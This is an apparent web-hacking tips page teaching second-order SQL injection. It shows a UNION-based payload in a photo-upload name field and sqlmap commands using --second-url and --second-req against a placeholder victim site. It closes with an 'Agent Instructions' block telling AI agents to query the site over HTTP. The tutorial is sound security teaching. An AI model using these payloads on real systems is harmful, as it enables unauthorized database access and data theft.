# Week 37 - Second Order SQLi This week’s web hacking tip is on Second-Order SQL injections! I’m sure most of you are plenty familiar with standard SQLi, but did you know that the payload result does not always render directly in the response? Let me explain.. Let’s say we have a web application that allows you to upload a photo and specify the photo name. When the photo is uploaded it displays on ‘view\.php’ with all the other photos of the site, with the corresponding name under each photo. Let’s also assume the form upload is vulnerable to UNION-based SQLi in the photo name parameter. Putting this all together, we can only exploit the SQL injection by issuing UNION-based payloads in the form upload request and then loading ‘view\.php’ which displays all the photos. If all goes well, a payload like ‘+UNION+ALL+SELECT+1,2,@@version,4,5--+-’ will display something like ‘5.6.10’ as the name of the target photo on ‘view\.php’. Now how do we automate it? Luckily for us, SQLMap supports both --second-url and --second-req, which allow you to specify the second url/request file that actually loads the payload result. So we will issue the injection on 'upload.php', then load 'view\.php' to get the result: Get view\.php as URL: sqlmap -r upload\_request.txt -p photoName --second-url "http\[:]//victim\[.]com/view\[.]php" Get view\.php as request file: sqlmap -r upload\_request.txt -p photoName --second-req view\_request.txt Keep this in mind next time you’re dumping a DB! ![](/files/0hYblAzplIWlYONdSJ7j) --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://www.webhackingtips.com/week-37-second-order-sqli.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.